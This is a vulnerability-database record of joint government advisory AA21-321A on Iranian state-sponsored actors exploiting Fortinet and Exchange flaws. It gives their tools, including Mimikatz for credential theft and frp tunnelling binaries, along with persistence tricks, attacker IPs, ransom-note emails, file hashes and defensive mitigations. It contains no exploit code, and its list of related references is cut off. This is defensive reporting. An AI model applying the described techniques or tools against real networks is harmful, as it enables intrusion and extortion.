DATABASE RESOURCES PRICING ABOUT US

{"id": "AA21-321A", "vendorId": null, "type": "ics", "bulletinFamily": "info", "title": "Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities", "description": "### Summary\n\n_**Actions to Take Today to Protect Against Iranian State-Sponsored Malicious Cyber Activity** \n\u2022 Immediately patch software affected by the following vulnerabilities: CVE-2021-34473, 2018-13379, 2020-12812, and 2019-5591._ \n\u2022 _Implement [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>)._ \n_\u2022 Use [strong, unique passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>).v_\n\n___**Note:** this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework, version 10. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v9/techniques/enterprise/>) for all referenced threat actor tactics and techniques.___\n\nThis joint cybersecurity advisory is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom\u2019s National Cyber Security Centre (NCSC) to highlight ongoing malicious cyber activity by an advanced persistent threat (APT) group that FBI, CISA, ACSC, and NCSC assess is associated with the government of Iran. FBI and CISA have observed this Iranian government-sponsored APT group exploit Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021 to gain initial access to systems in advance of follow-on operations, which include deploying ransomware. ACSC is also aware this APT group has used the same Microsoft Exchange vulnerability in Australia.\n\nThe Iranian government-sponsored APT actors are actively targeting a broad range of victims across multiple U.S. critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations. FBI, CISA, ACSC, and NCSC assess the actors are focused on exploiting known vulnerabilities rather than targeting specific sectors. These Iranian government-sponsored APT actors can leverage this access for follow-on operations, such as data exfiltration or encryption, ransomware, and extortion.\n\nThis advisory provides observed tactics and techniques, as well as indicators of compromise (IOCs) that FBI, CISA, ACSC, and NCSC assess are likely associated with this Iranian government-sponsored APT activity.\n\nThe FBI, CISA, ACSC, and NCSC urge critical infrastructure organizations to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from Iranian government-sponsored cyber actors.\n\nFor a downloadable copy of IOCs, see AA21-321A.stix.\n\nFor more information on Iranian government-sponsored malicious cyber activity, see [us-cert.cisa.gov/Iran](<https://www.us-cert.cisa.gov/iran>).\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Threat Actor Activity\n\nSince at least March 2021, the FBI and CISA have observed Iranian government-sponsored APT actors leverage Microsoft Exchange and Fortinet vulnerabilities to target a broad range of victims across multiple critical infrastructure sectors in furtherance of malicious activities. Observed activity includes the following.\n\n * In March 2021, the FBI and CISA observed these Iranian government-sponsored APT actors scanning devices on ports 4443, 8443, and 10443 for Fortinet FortiOS vulnerability [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>), and enumerating devices for FortiOS vulnerabilities [CVE-2020-12812](<https://vulners.com/cve/CVE-2020-12812>) and [CVE-2019-5591](<https://vulners.com/cve/CVE-2019-5591>). The Iranian Government-sponsored APT actors likely exploited these vulnerabilities to gain access to vulnerable networks. **Note:** for previous FBI and CISA reporting on this activity, refer to Joint Cybersecurity Advisory: [APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks](<https://www.ic3.gov/media/news/2021/210402.pdf>).\n * In May 2021, these Iranian government-sponsored APT actors exploited a Fortigate appliance to access a webserver hosting the domain for a U.S. municipal government. The actors likely created an account with the username `elie` to further enable malicious activity. **Note: **for previous FBI reporting on this activity, refer to [FBI FLASH: APT Actors Exploiting Fortinet Vulnerabilities to Gain Initial Access for Malicious Activity](<https://www.ic3.gov/media/news/2021/210527.pdf>).\n * In June 2021, these APT actors exploited a Fortigate appliance to access environmental control networks associated with a U.S.-based hospital specializing in healthcare for children. The Iranian government-sponsored APT actors likely leveraged a server assigned to IP addresses `91.214.124[.]143` and `162.55.137[.]20`\u2014which FBI and CISA judge are associated with Iranian government cyber activity\u2014to further enable malicious activity against the hospital\u2019s network. The APT actors accessed known user accounts at the hospital from IP address `154.16.192[.]70`, which FBI and CISA judge is associated with government of Iran offensive cyber activity.\n * As of October 2021, these APT actors have leveraged a Microsoft Exchange ProxyShell vulnerability\u2014`CVE-2021-34473`\u2014to gain initial access to systems in advance of follow-on operations.\n\nACSC considers that this APT group has also used the same Microsoft Exchange vulnerability ([CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>)) in Australia.\n\n### MITRE ATT&amp;CK Tactics and Techniques\n\nFBI, CISA, ACSC, and NCSC assess the following tactics and techniques are associated with this activity.\n\n#### Resource Development [[TA0042](<https://attack.mitre.org/versions/v10/tactics/TA0042>)]\n\nThe APT actors have used the following malicious and legitimate tools [[T1588.001](<https://attack.mitre.org/versions/v10/techniques/T1588/001>), [T1588.002](<https://attack.mitre.org/versions/v10/techniques/T1588/002>)] for a variety of tactics across the enterprise spectrum.\n\n * [Mimikatz](<https://attack.mitre.org/software/S0002>) for credential theft [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0042>)]\n * WinPEAS for privilege escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)]\n * SharpWMI (Windows Management Instrumentation)\n * WinRAR for archiving collected data [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009>), [T1560.001](<https://attack.mitre.org/versions/v10/techniques/T1560/001>)]\n * FileZilla for transferring files [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010>)]\n\n#### Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]\n\nThe Iranian government-sponsored APT actors gained initial access by exploiting vulnerabilities affecting Microsoft Exchange servers (CVE-2021-34473) and Fortinet devices (CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591) [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)].\n\n#### Execution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]\n\nThe Iranian government-sponsored APT actors may have made modifications to the Task Scheduler [[T1053.005](<https://attack.mitre.org/versions/v10/techniques/T1053/005>)]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:\n\n * `SynchronizeTimeZone`\n * `GoogleChangeManagement`\n * `MicrosoftOutLookUpdater`\n * `MicrosoftOutLookUpdateSchedule`\n\n#### Persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]\n\nThe Iranian government-sponsored APT actors may have established new user accounts on domain controllers, servers, workstations, and active directories [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)]. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:\n\n * `Support`\n * `Help`\n * `elie`\n * `WADGUtilityAccount`\n\n#### Exfiltration [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010/>)]\n\nThe FBI and CISA observed outbound File Transfer Protocol (FTP) transfers over port 443.\n\n#### Impact [[TA0040](<https://attack.mitre.org/versions/v10/tactics/TA0040>)]\n\nThe APT actors forced BitLocker activation on host networks to encrypt data [T1486]. The corresponding threatening notes were either sent to the victim or left on the victim network as a .txt file. The ransom notes included ransom demands and the following contact information. \n\n * sar_addr@protonmail[.]com\n * WeAreHere@secmail[.]pro\n * nosterrmann@mail[.]com\n * nosterrmann@protonmail[.]com \n\n## Detection\n\nThe FBI, CISA, ACSC, and NCSC recommend that organizations using Microsoft Exchange servers and Fortinet investigate potential suspicious activity in their networks. \n\n * Search for IOCs. Collect known-bad IOCs and search for them in network and host artifacts. **Note: **refer to Appendix A for IOCs.\n * Investigate exposed Microsoft Exchange servers (both patched and unpatched) for compromise. \n * Investigate changes to Remote Desktop Protocol (RDP), firewall, and Windows Remote Management (WinRM) configurations that may allow attackers to maintain persistent access. \n * Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.\n * Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating-system defined or recognized scheduled tasks for unrecognized \u201cactions\u201d (for example, review the steps each scheduled task is expected to perform).\n * Review antivirus logs for indications they were unexpectedly turned off.\n * Look for WinRAR and FileZilla in unexpected locations. \n\n**Note:** for additional approaches on uncovering malicious cyber activity, see joint advisory [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>), authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom. \n\n### Mitigations\n\nThe FBI, CISA, ACSC, and NCSC urge network defenders to apply the following mitigations to reduce the risk of compromise by this threat.\n\n#### Patch and Update Systems\n\n * Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. \n * Immediately patch software affected by vulnerabilities identified in this advisory: CVE-2021-34473, CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.\n\n#### Evaluate and Update Blocklists and Allowlists\n\n * Regularly evaluate and update blocklists and allowlists.\n * If FortiOS is not used by your organization, add the key artifact files used by FortiOS to your organization\u2019s execution blocklist. Any attempts to install or run this program and its associated files should be prevented.\n\n#### Implement and Enforce Backup and Restoration Policies and Procedures\n\n * Regularly back up data, air gap, and password protect backup copies offline.\n * Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides. \n * Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud). \n\n#### Implement Network Segmentation\n\n * Implement network segmentation to restrict adversary\u2019s lateral movement. \n\n#### Secure User Accounts\n\n * Audit user accounts with administrative privileges and configure access controls under the principles of least privilege and separation of duties. \n * Require administrator credentials to install software. \n\n#### Implement Multi-Factor Authentication\n\n * Use multifactor authentication where possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems. \n\n#### Use Strong Passwords\n\n * Require all accounts with password logins to have strong, unique passwords.\n\n#### Secure and Monitor RDP and other Potentially Risky Services\n\n * If you use RDP, restrict it to limit access to resources over internal networks.\n * Disable unused remote access/RDP ports.\n * Monitor remote access/RDP logs. \n\n#### Use Antivirus Programs\n\n * Install and regularly update antivirus and anti-malware software on all hosts. \n\n#### Secure Remote Access\n\n * Only use secure networks and avoid using public Wi-Fi networks. \n * Consider installing and using a VPN for remote access.\n\n#### Reduce Risk of Phishing\n\n * Consider adding an email banner to emails received from outside your organization.\n * Disable hyperlinks in received emails\n\n## Resources\n\n * For more information on Iranian government-sponsored malicious cyber activity, see [us-cert.cisa.gov/Iran](<https://www.us-cert.cisa.gov/iran>). \n * For information and resources on protecting against and responding to ransomware, refer to [StopRansomware.gov](<https://www.cisa.gov/stopransomware/>), a centralized, whole-of-government webpage providing ransomware resources and alerts.\n * The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>) provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.\n * CISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>) to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.\n * The U.S. Department of State\u2019s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ](<https://rewardsforjustice.net/english>) website for more information and how to report information securely.\n * ACSC can provide tailored cyber security advice and assistance, reporting, and incident response support at [cyber.gov.au](<https://www.cyber.gov.au/>) and via 1300 292 371 (1300 CYBER1).\n\n### Appendix A: Indicators of Compromise\n\nIP addresses and executables files are listed below. For a downloadable copy of IOCs, see AA21-321A.stix.\n\nIP Addresses\n\n * `91.214.124[.]143 `\n * `162.55.137[.]20 `\n * `154.16.192[.]70`\n\n#### Executable Files \n\nExecutable files observed in this activity are identified in table 1.\n\nTable 1: Executable Files \n\n**Filename:** | MicrosoftOutLookUpdater[.]exe \n---|--- \nMD5: | 1444884faed804667d8c2bfa0d63ab13 \nSHA-1: | 95E045446EFB8C9983EBFD85E39B4BE5D92C7A2A \nSHA-256: | c51fe5073bd493c7e8d83365aace3f9911437a0f2ae80042ba01ea46b55d2624 \nSHA-512: | 6451077B99C5F8ECC5C0CA88FE272156296BEB91218B39AE28A086DBA5E7E39813F044F9AF0FEDBB260941B1CD52FA237C098CBF4B2A822F08E3E98E934D0ECF \n**Filename:** | **MicrosoftOutlookUpdater.bat** \nMD5: | 1A44368EB5BF68688BA4B4357BDC874F \nSHA-1 | FA36FEBFD5A5CA0B3A1B19005B952683A7188A13 \nSHA-256 | 3A08D0CB0FF4D95ED0896F22F4DA8755525C243C457BA6273E08453E0E3AC4C4 \nSHA-512 | 70AA89449EB5DA1D84B70D114EF9D24CB74751CE12D12C783251E51775C89FDCE61B4265B43B1D613114D6A85E9C75927B706F39C576DBB036079C7E8CAF28B2 \n**Filename:** | **MicrosoftOutlookUpdater.xml** \nMD5: | AA40C49E309959FA04B7E5AC111BB770 \nSHA-1 | F1D90E10E6E3654654E0A677763C9767C913F8F0 \nSHA-256 | 5C818FE43F05F4773AD20E0862280B0D5C66611BB12459A08442F55F148400A6 \nSHA-512 | E55A86159F2E869DCDB64FDC730DA893718E20D65A04071770BD32CAE75FF8C34704BDF9F72EF055A3B362759EDE3682B3883C4D9BCF87013076638664E8078E \n**Filename:** | **GoogleChangeManagement.xml** \nMD5: | AF2D86042602CBBDCC7F1E8EFA6423F9 \nSHA-1 | CDCD97F946B78831A9B88B0A5CD785288DC603C1 \nSHA-256 | 4C691CCD811B868D1934B4B8E9ED6D5DB85EF35504F85D860E8FD84C547EBF1D \nSHA-512 | 6473DAC67B75194DEEAEF37103BBA17936F6C16FFCD2A7345A5A46756996FAD748A97F36F8FD4BE4E1F264ECE313773CC5596099D68E71344D8135F50E5D8971 \n**Filename:** | **Connector3.exe** \nMD5: | e64064f76e59dea46a0768993697ef2f \n**Filename:** | **Audio.exe or frpc.exe** \nMD5: | b90f05b5e705e0b0cb47f51b985f84db \nSHA-1 | 5bd0690247dc1e446916800af169270f100d089b \nSHA-256: | 28332bdbfaeb8333dad5ada3c10819a1a015db9106d5e8a74beaaf03797511aa \nVhash: | 017067555d5d15541az28!z \nAuthentihash: | ed463da90504f3adb43ab82044cddab8922ba029511da9ad5a52b8c20bda65ee \nImphash: | 93a138801d9601e4c36e6274c8b9d111 \nSSDEEP: | 98304:MeOuFco2Aate8mjOaFEKC8KZ1F4ANWyJXf/X+g4:MeHFV2AatevjOaDC8KZ1xNWy93U \nNote: | \n\nIdentical to \u201cfrpc.exe\u201d available at:\n\nhttps://github[.]com/fatedier/frp/releases/download/v0.34.3/frp_0.34.3_windows_amd64.zip \n \n**Filename:** | **Frps.exe** \nMD5: | 26f330dadcdd717ef575aa5bfcdbe76a \nSHA-1 | c4160aa55d092cf916a98f3b3ee8b940f2755053 \nSHA-256: | d7982ffe09f947e5b4237c9477af73a034114af03968e3c4ce462a029f072a5a \nVhash: | 017057555d6d141az25!z \nAuthentihash: | 40ed1568fef4c5f9d03c370b2b9b06a3d0bd32caca1850f509223b3cee2225ea \nImphash: | 91802a615b3a5c4bcc05bc5f66a5b219 \nSSDEEP: | 196608:/qTLyGAlLrOt8enYfrhkhBnfY0NIPvoOQiE:GLHiLrSfY5voO \nNote: | \n\nIdentical to \u201cfrps.exe\u201d available at: \n\nhttps://github[.]com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_windows_amd64.zip \n \n### APPENDIX B: MITRE ATT&amp;CK TACTICS AND TECHNIQUES\n\nTable 2 identifies MITRE ATT&amp;CK Tactics and techniques observed in this activity.\n\nTable 2: Observed Tactics and Techniques\n\nTactic | Technique \n---|--- \nResource Development [[TA0042](<https://attack.mitre.org/versions/v10/tactics/TA0042>)] | \n\nObtain Capabilities: Malware [[T1588.001](<https://attack.mitre.org/versions/v10/techniques/T1588/001>)] \n \nObtain Capabilities: Tool [[T1588.002](<https://attack.mitre.org/versions/v10/techniques/T1588/002>)] \n \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)] | \n\nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)] \n \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]\n\n| \n\nScheduled Task/Job: Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v10/techniques/T1053/005>)] \n \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)] | \n\nCreate Account: Local Account [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>)] \n \nCreate Account: Domain Account [[T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)] \nPrivilege Escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)] | \n \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0042>)]\n\n| \nCollection [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009>)] | \n\nArchive Collected Data: Archive via Utility [[T1560.001](<https://attack.mitre.org/versions/v10/techniques/T1560/001>)] \n \nExfiltration [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010/>)] | \nImpact [[TA0040](<https://attack.mitre.org/versions/v10/tactics/TA0040>)] | Data Encrypted for Impact [[T1486](<https://attack.mitre.org/versions/v10/techniques/T1486>)] \n \n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <https://www.fbi.gov/contact-us/field-offices>, or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov> \"Email CISA Central\" ). Australian organizations can visit [cyber.gov.au](<https://www.cyber.gov.au/>) or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.\n\n### Revisions\n\nNovember 17, 2021: Initial Version|November 19, 2021: Added STIX files\n", "published": "2021-11-19T12:00:00", "modified": "2021-11-19T12:00:00", "epss": [{"cve": "CVE-2018-13379", "epss": 0.97257, "percentile": 0.99813, "modified": "2023-12-06"}, {"cve": "CVE-2019-5591", "epss": 0.00234, "percentile": 0.6127, "modified": "2023-12-06"}, {"cve": "CVE-2020-12812", "epss": 0.00555, "percentile": 0.74976, "modified": "2023-12-06"}, {"cve": "CVE-2021-34473", "epss": 0.97344, "percentile": 0.99872, "modified": "2023-12-06"}, {"cve": "CVE-2023-26360", "epss": 0.91394, "percentile": 0.98598, "modified": "2023-11-08"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://www.facebook.com/sharer/sharer.php?u=https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a&title=Iranian%20Government-Sponsored%20APT%20Cyber%20Actors%20Exploiting%20Microsoft%20Exchange%20and%20Fortinet%20Vulnerabilities%20in%20Furtherance%20of%20Malicious%20Activities", "https://twitter.com/intent/tweet?text=Iranian%20Government-Sponsored%20APT%20Cyber%20Actors%20Exploiting%20Microsoft%20Exchange%20and%20Fortinet%20Vulnerabilities%20in%20Furtherance%20of%20Malicious%20Activities+https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a", "https://www.linkedin.com/sharing/share-offsite/?url=https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a", "mailto:?subject=Iranian%20Government-Sponsored%20APT%20Cyber%20Actors%20Exploiting%20Microsoft%20Exchange%20and%20Fortinet%20Vulnerabilities%20in%20Furtherance%20of%20Malicious%20Activities&body=https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a", "https://us-cert.cisa.gov/ncas/tips/ST05-012", "https://us-cert.cisa.gov/ncas/tips/ST04-002", "https://attack.mitre.org/versions/v9/techniques/enterprise/", "https://www.us-cert.cisa.gov/iran", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591", "https://www.ic3.gov/media/news/2021/210402.pdf", "https://www.ic3.gov/media/news/2021/210527.pdf", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473", "https://attack.mitre.org/versions/v10/tactics/TA0042", "https://attack.mitre.org/versions/v10/techniques/T1588/001", "https://attack.mitre.org/versions/v10/techniques/T1588/002", "https://attack.mitre.org/software/S0002", "https://attack.mitre.org/versions/v10/tactics/TA0042", "https://attack.mitre.org/versions/v10/tactics/TA0004", "https://attack.mitre.org/versions/v10/tactics/TA0009", "https://attack.mitre.org/versions/v10/techniques/T1560/001", "https://attack.mitre.org/versions/v10/tactics/TA0010", "https://attack.mitre.org/versions/v10/tactics/TA0001/", "https://attack.mitre.org/versions/v10/techniques/T1190/", "https://attack.mitre.org/versions/v10/tactics/TA0002", "https://attack.mitre.org/versions/v10/techniques/T1053/005", "https://attack.mitre.org/versions/v10/tactics/TA0003", "https://attack.mitre.org/versions/v10/techniques/T1136/001", "https://attack.mitre.org/versions/v10/techniques/T1136/002", "https://attack.mitre.org/versions/v10/tactics/TA0010/", "https://attack.mitre.org/versions/v10/tactics/TA0040", "https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf", "https://www.us-cert.cisa.gov/iran", "https://www.cisa.gov/stopransomware/", "https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf", "https://www.cisa.gov/cyber-hygiene-services", "https://rewardsforjustice.net/english", "https://www.cyber.gov.au/", "https://attack.mitre.org/versions/v10/tactics/TA0042", "https://attack.mitre.org/versions/v10/techniques/T1588/001", "https://attack.mitre.org/versions/v10/techniques/T1588/002", "https://attack.mitre.org/versions/v10/tactics/TA0001/", "https://attack.mitre.org/versions/v10/techniques/T1190/", "https://attack.mitre.org/versions/v10/tactics/TA0002", "https://attack.mitre.org/versions/v10/techniques/T1053/005", "https://attack.mitre.org/versions/v10/tactics/TA0003", "https://attack.mitre.org/versions/v10/techniques/T1136/001", "https://attack.mitre.org/versions/v10/techniques/T1136/002", "https://attack.mitre.org/versions/v10/tactics/TA0004", "https://attack.mitre.org/versions/v10/tactics/TA0042", "https://attack.mitre.org/versions/v10/tactics/TA0009", "https://attack.mitre.org/versions/v10/techniques/T1560/001", "https://attack.mitre.org/versions/v10/tactics/TA0010/", "https://attack.mitre.org/versions/v10/tactics/TA0040", "https://attack.mitre.org/versions/v10/techniques/T1486", "https://www.fbi.gov/contact-us/field-offices", "https://www.cyber.gov.au/", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a", "https://www.facebook.com/CISA", "https://twitter.com/CISAgov", "https://www.linkedin.com/company/cybersecurity-and-infrastructure-security-agency", "https://www.youtube.com/@cisagov", "https://www.instagram.com/cisagov", "https://www.dhs.gov/performance-financial-reports", "https://www.dhs.gov", "https://www.dhs.gov/foia", "https://www.oig.dhs.gov/", "https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_138", "https://www.whitehouse.gov/", "https://www.usa.gov/"], "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-34473", "CVE-2023-26360"], "immutableFields": [], "lastseen": "2023-12-06T15:51:17", "viewCount": 29, "enchantments": {"dependencies": {"references": [{"type": "adobe", "idList": ["APSB23-25"]}, {"type": "attackerkb", "idList": ["AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "AKB:5DB640DC-B30F-464A-BC81-ED3C15946D65", "AKB:91756851-9B25-4801-B911-E3226A0656B5", "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC", "AKB:CC339C3D-417D-4477-92A7-746AEA51530C", "AKB:FB9BE99D-7DDE-493D-8C9D-12F3DD901458"]}, {"type": "avleonov", "idList": ["AVLEONOV:4E65E4AC928647D5E246B06B953BBC6F", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-1187", "CPAI-2021-0476"]}, {"type": "cisa", "idList": ["CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF", "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2018-13379", "CISA-KEV-CVE-2019-5591", "CISA-KEV-CVE-2020-12812", "CISA-KEV-CVE-2021-34473", "CISA-KEV-CVE-2023-26360"]}, {"type": "cve", "idList": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473", "CVE-2023-26360"]}, {"type": "dsquare", "idList": ["E-691"]}, {"type": "exploitdb", "idList": ["EDB-ID:47287", "EDB-ID:47288"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5", "EXPLOITPACK:E222442D181419B052AACE6DA4BC8485"]}, {"type": "fireeye", "idList": ["FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "fortinet", "idList": ["FG-IR-18-384", "FG-IR-19-037", "FG-IR-19-283", "FG-IR-20-233"]}, {"type": "githubexploit", "idList": ["0A015784-48D7-5DC1-9FB9-416A9BBEA6D5", "2BEFA353-947D-5B41-AE38-EDB0C71B5B44", "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "4AC49DB9-A784-561B-BF92-94209310B51B", "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "E458F533-4B97-51A1-897B-1AF58218F2BF", "F00E8BE4-12D2-5F5B-A9AA-D627780259FB", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E"]}, {"type": "hivepro", "idList": ["HIVEPRO:09525E3475AC1C5F429611A90182E82F", "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "HIVEPRO:1825C4046C6054693C41D7D5DFD7BA10", "HIVEPRO:186D6EE394314F861D57F4243E31E975", "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:F2305684A25C735549865536AA4254BF", "HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "ics", "idList": ["AA18-284A", "AA18-337A", "AA19-024A", "AA19-122A", "AA19-168A", "AA19-290A", "AA19-339A", "AA20-006A", "AA20-010A", "AA20-014A", "AA20-020A", "AA20-031A", "AA20-049A", "AA20-073A", "AA20-099A", "AA20-106A", "AA20-107A", "AA20-120A", "AA20-126A", "AA20-133A", "AA20-182A", "AA20-183A", "AA20-195A", "AA20-198A", "AA20-205A", "AA20-206A", "AA20-209A", "AA20-225A", "AA20-227A", "AA20-239A", "AA20-245A", "AA20-258A", "AA20-259A", "AA20-266A", "AA20-275A", "AA20-280A", "AA20-283A", "AA20-296A", "AA20-296B", "AA20-301A", "AA20-302A", "AA20-304A", "AA20-336A", "AA20-345A", "AA20-352A", "AA21-0000A", "AA21-008A", "AA21-042A", "AA21-048A", "AA21-055A", "AA21-062A", "AA21-076A", "AA21-077A", "AA21-110A", "AA21-116A", "AA21-131A", "AA21-148A", "AA21-200A", "AA21-200B", "AA21-201A", "AA21-209A", "AA21-229A", "AA21-243A", "AA21-259A", "AA21-287A", "AA21-291A", "AA21-336A", "AA21-356A", "AA22-011A", "AA22-040A", "AA22-047A", 